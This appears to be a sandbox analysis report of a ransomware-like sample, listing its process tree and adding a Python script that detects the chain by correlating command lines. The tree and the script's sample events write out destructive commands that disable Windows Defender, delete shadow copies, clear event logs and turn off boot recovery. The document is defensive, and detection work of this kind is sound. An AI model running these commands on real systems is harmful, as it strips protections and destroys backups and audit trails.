  [2] reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f  (PID 544)
  [2] reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f  (PID 1724)
  [2] reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f  (PID 860)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f  (PID 1072)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f  (PID 2004)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f  (PID 1196)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f  (PID 1844)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f  (PID 1560; Modifies security service)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (PID 1500)
  [2] vssadmin.exe delete shadows /all /quiet  (PID 1708; Interacts with shadow copies)
  [2] wevtutil.exe cl system  (PID 1592; Suspicious use of AdjustPrivilegeToken)
  [2] wevtutil.exe cl security  (PID 1164; Suspicious use of AdjustPrivilegeToken)
  [2] wevtutil.exe cl application  (PID 1700; Suspicious use of AdjustPrivilegeToken)
  [2] wmic.exe SHADOWCOPY /nointeractive  (PID 1048; Suspicious use of AdjustPrivilegeToken)
  [2] wmic.exe shadowcopy delete  (PID 892; Suspicious use of AdjustPrivilegeToken)
  [2] bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures  (PID 2064; Modifies boot configuration data using bcdedit)
  [2] bcdedit.exe /set {default} recoveryenabled no  (PID 2088; Modifies boot configuration data using bcdedit)
  [2] cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (PID 2108)
    [3] "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (PID 2128; Deletes Windows Defender Definitions)
  [2] cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true  (PID 2140)
    [3] powershell Set-MpPreference -DisableIOAVProtection $true  (PID 2160; Suspicious behavior: EnumeratesProcesses)
  [2] cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true  (PID 2228)
    [3] powershell Set-MpPreference -DisableRealtimeMonitoring $true  (PID 2248; Suspicious behavior: EnumeratesProcesses)
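The tree above is the usual pre-encryption sequence: stop and disable backup-related services, strip Defender through policy keys, service Start values, scheduled tasks and MpCmdRun, delete shadow copies, clear the event logs, and turn off boot recovery. Each step alone is something an administrator might legitimately run; the signal is several of them under one parent in quick succession. The script below is an added example, not the sandbox's own logic: it applies command-line rules to process-creation records (Sysmon Event ID 1 / Security 4688 style) constructed from this tree, with PIDs as logged; the sample's own parent PID is not in the report, so 0 stands in for it, and PIDs 4000/4001 are a constructed benign control. It groups hits by root ancestor and alerts only when one root accumulates several distinct techniques, so a lone wevtutil cl or bcdedit does not fire. The record field names are an assumed normalised schema, and the ATT&CK IDs are current Enterprise technique IDs rather than the v6 mapping this report was scored against.

```python
"""Correlate the pre-encryption chain from this report in process-creation
telemetry (Sysmon Event ID 1 / Security 4688 style records).

Added example, not the sandbox's own logic. SAMPLE_EVENTS is constructed from
the process tree above (PIDs as logged there; the sample's own parent PID is
not in the report, so 0 is a placeholder). The pid/ppid/image/cmdline schema
is an assumed normalised form; ATT&CK IDs are current ones, not Enterprise v6.
"""
import re
from collections import defaultdict

SAMPLE = "cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

# (label, ATT&CK technique, regex searched in the lower-cased command line)
RULES = [
    ("shadow_copy_delete", "T1490",
     r'vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete'),
    ("boot_recovery_disabled", "T1490",
     r'bcdedit(\.exe)?\s+/set\s+\{default\}\s+'
     r'(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)'),
    ("event_log_cleared", "T1070.001",
     r'wevtutil(\.exe)?\s+cl\s+(system|security|application)'),
    ("backup_service_stopped", "T1489",
     r'net1?(\.exe)?\s+stop\s+"?(vss|wbengine|sdrsvc)"?'),
    ("backup_service_disabled", "T1489",
     r'sc(\.exe)?\s+config\s+"?(vss|wbengine|sdrsvc)"?\s+start=\s*disabled'),
    ("defender_policy_tamper", "T1562.001",
     r'reg(\.exe)?\s+add\s+"hklm\\software\\policies\\microsoft\\windows defender'
     r'.*?(disableantispyware|disableantivirus|disablerealtimemonitoring|'
     r'disableioavprotection|disablebehaviormonitoring)'),
    ("defender_service_disabled", "T1562.001",
     r'reg(\.exe)?\s+add\s+"hklm\\system\\currentcontrolset\\services\\'
     r'(windefend|wdfilter|wdboot|wdnisdrv|wdnissvc|securityhealthservice)"'
     r'.*?/d\s+"?4"?'),
    ("defender_definitions_removed", "T1562.001",
     r'mpcmdrun(\.exe)?"?\s+-removedefinitions\s+-all'),
    ("defender_preference_disabled", "T1562.001",
     r'set-mppreference\s+-disable\w+\s+\$true'),
]
COMPILED = [(label, tid, re.compile(rx)) for label, tid, rx in RULES]


def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


# Subset of the tree above, plus a constructed benign control (PIDs 4000/4001):
# an administrator clearing a single log from a separate shell.
SAMPLE_EVENTS = [
    ev(612, 0, SAMPLE, '"C:\\Users\\Admin\\AppData\\Local\\Temp\\' + SAMPLE + '"'),
    ev(624, 612, "net.exe", 'net.exe stop "VSS" /y'),
    ev(2016, 624, "net1.exe", r'C:\Windows\system32\net1 stop "VSS" /y'),
    ev(1764, 612, "sc.exe", 'sc.exe config "VSS" start= disabled'),
    ev(1368, 612, "reg.exe", r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" '
                             r'/v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    ev(1560, 612, "reg.exe", r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" '
                             r'/v "Start" /t REG_DWORD /d "4" /f'),
    ev(1708, 612, "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ev(1592, 612, "wevtutil.exe", "wevtutil.exe cl system"),
    ev(892, 612, "wmic.exe", "wmic.exe shadowcopy delete"),
    ev(2064, 612, "bcdedit.exe", "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ev(2088, 612, "bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled no"),
    ev(2108, 612, "cmd.exe", r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ev(2128, 2108, "MpCmdRun.exe", r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ev(2228, 612, "cmd.exe", "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ev(2248, 2228, "powershell.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ev(4000, 0, "cmd.exe", "cmd.exe"),
    ev(4001, 4000, "wevtutil.exe", "wevtutil.exe cl application"),
]


def classify(cmdline):
    """Set of (label, ATT&CK id) pairs whose pattern matches one command line."""
    low = cmdline.lower()
    return {(label, tid) for label, tid, rx in COMPILED if rx.search(low)}


def root_of(pid, by_pid):
    """Follow ppid links to the top-most ancestor present in the event set."""
    while by_pid[pid]["ppid"] in by_pid:
        pid = by_pid[pid]["ppid"]
    return pid


def correlate(events, threshold=3):
    """Group technique hits by root ancestor; alert on any root with at least
    `threshold` distinct techniques. Returns (per_root, alerts)."""
    by_pid = {e["pid"]: e for e in events}
    per_root = defaultdict(set)
    for e in events:
        for hit in classify(e["cmdline"]):
            per_root[root_of(e["pid"], by_pid)].add(hit)
    alerts = {root: sorted(hits) for root, hits in per_root.items() if len(hits) >= threshold}
    return dict(per_root), alerts


if __name__ == "__main__":
    per_root, alerts = correlate(SAMPLE_EVENTS)
    for root, hits in alerts.items():
        print(f"ALERT: root PID {root} ({len(hits)} distinct techniques)")
        for label, tid in hits:
            print(f"  {tid:<10} {label}")
    for root in sorted(set(per_root) - set(alerts)):
        print(f"below threshold: root PID {root} -> {sorted(per_root[root])}")
```

On live telemetry, add a time window to the grouping and weight the root's image path (a binary under a user's Temp directory, as here, deserves a lower threshold than one under System32).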
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5: 216713faf5ad3db231c65bc3fc07f2e7
SHA1: c325742dc83cddf54949c60fe4f77ebeb63dc906
SHA256: 72776fc4a59574f414dfeb634bc5fcf58f462dd922bac82e05326749dbfc8f54
SHA512: 32ea81b4a7387afe8b3f8ae5fcc76fbceb2f8fdc09616b07cc05b9d52312b9fdc8294e9f8681233ec69e7b67c0aa0e2c7cde1d78f0e9777cbdfbfc4b12fe510c